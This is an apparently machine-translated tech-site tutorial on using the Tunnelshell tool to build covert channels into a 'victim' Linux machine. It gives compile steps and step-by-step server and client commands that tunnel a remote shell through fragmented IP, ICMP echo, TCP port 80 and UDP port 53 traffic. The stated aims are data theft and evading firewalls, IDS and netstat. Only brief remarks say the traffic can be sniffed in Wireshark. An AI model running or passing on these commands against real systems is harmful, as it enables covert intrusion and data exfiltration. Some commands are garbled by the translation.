Shulou(Shulou.com)06/02 Report--

This article shows you how to get data from target hosts through Covert Channel. It is concise and easy to understand. It will definitely make your eyes shine. I hope you can learn something from the detailed introduction of this article.

What is Covert Channel?

The word covert means "hidden or undetectable" and the channel is a "mode of communication," so covert channels denote undetectable communication networks. It is important to understand the difference between encrypted and covert communications. In covert communication, the data stream is tampered with and persisted by an unauthorized party. Encrypted communications, however, do not obscure the fact that communications are made by encrypting data transmitted between two endpoints.

Type of Covert Channel

Network covert storage channel: sender directly or indirectly some target value, receiver directly or indirectly read target value.

Network Covert Time Channel: The sender transmits information using resources (e.g. CPU) by modulation in the time domain, and the receiver can observe and decode the information.

Compared with storage covert channel, temporal covert channel is also called memoryless channel, which cannot store information for a long time. The sender's message must be received by the receiver in time, otherwise the message will disappear.

Covert Channel Attacks Using Tunnelshell

Almost any protocol can be used to establish covert channels. Most covert channel studies are based on Layer 3 (network) and Layer 4 (transport) protocols such as ICMP, IP, and TCP. Layer 7 (application) protocols such as HTTP and DNS are also frequently used. This mechanism is used to transmit information without alerting network firewalls and IDS, and netstat cannot detect it.

Introduction to Tunnelshell

Tunnelshell is a program written in C for Linux users that uses the client-server paradigm. Server open/bin/sh Client can access via virtual tunnel. It supports multiple protocols including TCP, UDP, ICMP and RawIP. In addition, packets can be segmented to avoid detection by firewalls and IDS.

experimental environment

Server (Kali Linux)

Client (Ubuntu 18.04)

Tunnelshell

Here, assume that we have established a session with the victim machine via the c2 server. Now, we need to create a hidden channel for data breaches, so we need to install tunnelshell on both endpoints.

After downloading, extract the file and compile it as follows:

tar xvfz tunnelshell_2.3.tgzmake

Similarly, repeat the same operation on the other endpoint (victim's machine), and when done, execute the following command in the terminal to open the server's channel (Attacker).

sudo ./ tunneld

By default, it sends segmented packets that reassemble at the destination endpoint to avoid firewalls and IDS.

Now to connect with tunnelshell, we need to execute the following command on the server (attacker's machine), which will establish a covert channel for data breach.

Syntax: ./ tunnel -i -d -s -t -o -p -m -a

./ tunnel -t frag 10.10.10.2

frag: Encapsulates data using IPv4 segmented packets. When certain routers and firewalls, such as Cisco routers and default Linux installations, receive fragmented Layer 4 packets without headers, they allow them to pass through even though they have rules to deny it. As you can see it has successfully connected to 10.10.10.2, we will access the shell of the victim machine.

As I said, if you use network stats to check network connection status, you won't see any process IDs for tunnelshell. As you can see in the figure below, I've checked the tunnelshell's processes with the help of the ps command and tried checking its process ID via netstat.

ps |grep .tunneldnetstat -ano

Let's take a look at 10.10.10.1 (attacker's IP) and 10. 10.10.2(IP of the victim). The network flow looks like normal traffic between two endpoints, but if monitored correctly, network administrators can sniff packets. As you can see, Wireshark captures covert traffic and sniffs data that is being transmitted between two endpoint devices.

Covert ICMP channel

We know that Ping uses ICMP communication to establish a connection between two hosts by sending out icmp echo request packets and receiving icmp echo reply packets. Therefore, execute the following command:

sudo ./ tunneld -t icmp -m echo-reply, echo

Now to connect with tunnelshell, we need to execute the following command on the server (attacker's machine), which will establish a covert channel for data breach.

./ tunnel -t icmp -m echo-reply,echo 10.10.10.2

As you can see it has successfully connected to 10.10.10.2 and the attacker was able to access the shell of the victim computer.

Similarly, if you capture traffic via Wireshark, you will notice ICMP echo request and reply packets being transmitted between the two endpoints. If you try to analyze these packets, you will be able to see what payload is being transmitted as ICMP data.

Covert HTTP Channel

It establishes a virtual TCP connection without a three-way handshake and binds no ports, so you can use a port already used by another process to execute the following command:

sudo ./ tunneld -t tcp -p 80,2000

Now to connect with tunnelshell, we need to execute the following command on the server (attacker's machine), which will establish a covert channel for data breach.

./ tunnel -t tcp -p 80,2000 10.10.10.2

As you can see, it has successfully connected to 10.10.10.2, and the attacker was able to access the victim's computer shell again.

Through network traffic you can see that tcp communication is established between the source and destination, but there is no real three-way handshake.

Covert DNS channel

To establish DNS covert channels, we need to run UDP tunneling mode on both endpoint machines. Therefore, on the victim's machine we execute the following command:

sudo ./ tunneld -t udp -p 53,2000

Also, execute the following command on your (attacker) machine to connect the tunnel.

./ tunnel -t udp -p 53,2000 10.10.10.2

As you can see, DNS error packets contain data transmitted between two endpoint machines.

Covert channels do not send encrypted packets when data is compromised, so they are easily sniffed and network administrators can easily perform data loss prevention and risk management.

That's how you get data from target hosts via Covert Channel. Have you learned anything or skills? If you want to learn more skills or enrich your knowledge reserves, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.